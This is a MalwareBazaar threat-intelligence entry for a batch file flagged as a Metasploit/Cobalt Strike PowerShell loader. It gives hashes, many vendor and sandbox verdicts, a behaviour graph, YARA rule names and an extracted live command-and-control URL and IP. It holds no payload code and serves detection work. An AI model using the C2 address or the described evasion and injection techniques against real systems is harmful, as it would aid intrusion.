MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Cobalt Strike


Vendor detections: 16


Intelligence 16 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee
SHA3-384 hash: ad8668fd482b771c9c1c46aec31517456c6638803a554e61b6fd3a3e7d02d688cc6415ddb25adb3232f5d0876402fd3e
SHA1 hash: 6dbb6fdb21c0a9d282ae5102702331039bdb6d38
MD5 hash: fd0ba3141672396b6e1145db7bb06af0
humanhash: angel-seven-avocado-cardinal
File name:Target.bat
Download: download sample
Signature Cobalt Strike
Create hunting rule
File size:8'151 bytes
First seen:2025-08-24 17:37:54 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/plain
ssdeep 192:+n2jh1hqT2K+XKSPVngR/yqklImNXJJ4+zFaT7q6b2dHhW:+n2jh1hsUhVnSClhP6KdHhW
TLSH T177F1007AC631BCD443AD328067651C5F22E44A57D3B74B64CB091CF63E65392EF1AA8C
Magika powershell
Reporter abuse_ch
Tags:bat Cobalt Strike

Intelligence

File Origin
# of uploads :
1
# of downloads :
495
Origin country :
SE SE
Vendor Threat Intelligence
Malware family:
tinynuke
Create hunting rule
ID:
1
File name:
main.exe
Verdict:
Malicious activity
Analysis date:
2025-08-23 20:00:39 UTC
Tags:
auto xworm rat python phishing github anti-evasion loader tinynuke xtinyloader meterpreter backdoor payload metasploit uac powershellempire framework vidar stealer telegram evasion generic rhadamanthys quasar agenttesla asyncrat pyinstaller irc lumma n-w0rm worm masslogger
Link:
https://app.any.run/tasks/8f0246a1-0061-439c-9e85-c3c9cb86389f

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/23271/
Detection(s):
SecuriteInfo.com.Heur.BZC.PZQ.Boxter.797.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.PUA.PowerShell.Agent-4.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68ab4e586eed937d746d7663
Tags:
metasploit ransomware xtreme shell
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd
Link:
https://www.filescan.io/uploads/68ab4ee37137d684583a299c/reports/a60ebc0f-c876-4896-807b-65461c23c033/overview
Verdict:
Malicious
Labled as:
Trojan.Script
Link:
https://www.hybrid-analysis.com/sample/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee
Verdict:
Malicious
File Type:
unix shell
First seen:
2025-08-17T11:43:00Z UTC
Last seen:
2025-08-17T11:43:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee/results?tab=lookup
Result
Threat name:
Metasploit
Create hunting rule
Detection:
malicious
Classification:
troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1764030
Signature
Antivirus / Scanner detection for submitted sample
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Yara detected Metasploit Payload
Yara detected MetasploitPayload
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1764030 Sample: Target.bat Startdate: 24/08/2025 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 10 other signatures 2->39 9 cmd.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        process3 dnsIp4 49 Suspicious powershell command line found 9->49 51 Encrypted powershell cmdline option found 9->51 15 cmd.exe 1 9->15         started        18 conhost.exe 9->18         started        31 127.0.0.1 unknown unknown 12->31 signatures5 process6 signatures7 53 Suspicious powershell command line found 15->53 55 Encrypted powershell cmdline option found 15->55 20 powershell.exe 19 15->20         started        process8 signatures9 41 Suspicious powershell command line found 20->41 43 Obfuscated command line found 20->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 20->45 23 powershell.exe 16 20->23         started        process10 dnsIp11 29 83.244.163.203, 7788 EXPONENTIAL-E-ASGB United Kingdom 23->29 47 Found suspicious powershell code related to unpacking or dynamic code loading 23->47 27 conhost.exe 23->27         started        signatures12 process13
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee/
Verdict:
Malicious
Threat:
Family.METASPLOIT
Link:
https://tip.neiki.dev/file/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee
Threat name:
Script-PowerShell.Backdoor.Meterpreter
Create hunting rule
Status:
Malicious
First seen:
2025-08-17 05:58:49 UTC
File Type:
Text (Batch)
AV detection:
15 of 24 (62.50%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=w7bqqaow725ovcjlprroojjtr65hzmvh2kw6sssfcrc3sni2jtxa._file
Verdict:
malicious
Label(s):
cobaltstrike
Create hunting rule
metasploit
Create hunting rule
Similar samples:
error
Cobalt Strike
Result
Malware family:
metasploit
Create hunting rule
Score:
  10/10
Tags:
family:metasploit backdoor defense_evasion discovery execution trojan
Link:
https://tria.ge/reports/250824-v9pt8sxrt6/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Modifies trusted root certificate store through registry
MetaSploit
Metasploit family
Malware Config
C2 Extraction:
http://83.244.163.203:7788/Lrl704cuqDDcT91Ouwu6vQIMO0OppTT5f-J_7eujoV1M60ne7Y_Z8ce_QGBE1llotu5Ww3Joa0knXvgWPdRyuMxlyG9h43g3JEUIIgwe8HZ-MPGpH1jmgkNldVZKP1ykI-JHC4hl0ICARvBqFkSDI
Malware family:
CobaltStrike
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/b7c30801d6fe/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Msfpayloads_msf_cmd
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Metasploit Payloads - file msf-cmd.ps1
Reference:Internal Research
Rule name:Msfpayloads_msf_cmd_RID2ECC
Create hunting rule
Author:Florian Roth
Description:Metasploit Payloads - file msf-cmd.ps1
Reference:Internal Research

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Cobalt Strike

Batch (bat) bat b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3609953/
  
Delivery method
Distributed via web download
Cape
Cape
https://www.capesandbox.com/analysis/23271/

Comments